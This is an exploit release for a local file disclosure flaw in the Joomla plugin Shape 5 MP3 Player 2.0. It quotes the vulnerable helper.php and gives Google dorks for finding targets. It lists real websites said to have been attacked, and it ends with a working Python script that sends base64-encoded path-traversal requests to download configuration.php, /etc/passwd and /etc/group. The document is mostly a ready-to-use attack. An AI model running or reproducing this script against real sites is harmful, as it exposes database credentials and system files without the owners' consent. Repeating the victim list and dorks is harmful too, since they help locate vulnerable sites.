.__ _____ _______
| |__ / | |___ __\ _ \_______ ____
| | \ / | |\ \/ / /_\ \_ __ \_/ __ \
| Y \/ ^ /> <\ \_/ \ | \/\ ___/
|___| /\____ |/__/\_ \\_____ /__| \___ >
\/ |__| \/ \/ \/
_____________________________
/ _____/\_ _____/\_ ___ \
\_____ \ | __)_ / \ \/
/ \ | \\ \____
/_______ //_______ / \______ /
\/ \/ \/
Joomla <= (Shape 5 MP3 Player 2.0) Local File Disclosure Exploit
~~~~~~~~~~~~~~~[My]~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
[+] Author : KnocKout
[~] Contact : knockout@e-mail.com.tr
[~] Skype : knockoutr@msn.com
[~] HomePage : http://milw00rm.com - http://h4x0resec.blogspot.com
[~] Greetz : b3mb4m, ZoRLu, KedAns-Dz ( milw00rm.com )
===================================================================
~~~~~~~~~~~~~~~~[Software info]~~~~~~~~~~~~~~~~~~~~~~~~~~~~
|~Web App. : Joomla
|~Plugin : Shape 5 MP3 Player 2.0
|~Affected Version : 2.0
|~Software : http://extensions.joomla.org/extension/shape-5-mp3-player
|~RISK : High
|~Google Dork : inurl:"php?fileUrl=" site:ru
|~Google Dork : inurl:plugins/content/s5_media_player
===================================================================
======================Info=========================================
helper.php unconsciously encoded.
This is a very simple security measures, It was exposed to attack.
if base64 encrypting the file names
'fileurl' function is used, and local files will be easily exposed.
============ Error line's in helper.php ===========================
<?php
$path = base64_decode($_REQUEST['fileurl']);
$base = basename($path);
$path1 = str_replace(' ','%20',$path);
header('Content-Description: File Transfer');
header('Content-Type:application/octet-stream');
header('Content-Transfer-Encoding: Binary');
header("Content-disposition: attachment; filename=\"".basename($path)."\"");
header('Content-Length: ' . filesize($path));
header('Cache-Control: must-revalidate, post-check=0, pre-check=0');
header('Pragma: public');
readfile($path1);
exit;
?>
======================================================================
======================== Tested on Demos ============================
www.kraskinotv.ru
www.alexandra-pavlyuk.ru
www.kovspas.ru
www.asetkz.ru
www.cciheredia.cr
www.helicopterspray.com
www.kpu-karawang.go.id
www.practicalbioethics.org
www.iccfoundation.us
www.mixticius.net
www.stbarnabasdulwich.org
www.ahavathachim.com
www.dcbaptist.org
www.stjohnmansfield.org
www.ilyda.com
www.mountainviewchapel.com
www.biamd.org
www.lavingtonunited.org
www.cypressbible.org
www.brianmcgilloway.com
www.toneside.com
..
etc
..
=======================================================================
================ usage: python h4.py www.site.com ====================
import base64
import sys
import urllib
def exploit():
while True:
print """
[1] = configuration.php
[2] = Try Read /etc/passwd
[3] = Try Read /etc/group
"""
command = raw_input("h4 Console# ")
if command == "1":
command = base64.b64encode("../../../configuration.php")
elif command == "2":
command = base64.b64encode("../../../../../../../../../etc/passwd")
elif command == "3":
command = base64.b64encode("../../../../../../../../../etc/group")
else:
command = base64.b64encode(command)
url = "http://%s/plugins/content/s5_media_player/helper.php?fileurl=%s" % (sys.argv[1],command)
try:
test = urllib.urlopen(url)
if len(test.read()) <= 0:
print "Exploit failed .."
else:
urllib.urlretrieve(url, command)
#wget.download(url)
print "Exploit success ! "
except Exception as e:
print "Unexpected error : %s " % e
if __name__ == '__main__':
if len(sys.argv) > 2:
print "Error usage : python exploit.py website.com"
else:
exploit()